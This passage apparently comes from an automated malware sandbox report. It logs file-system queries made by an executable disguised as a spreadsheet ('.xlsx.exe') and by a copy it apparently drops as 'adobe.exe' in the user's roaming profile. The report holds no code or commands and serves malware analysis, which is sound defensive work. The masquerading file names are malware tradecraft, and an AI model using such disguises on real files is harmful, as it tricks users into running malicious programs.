                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation
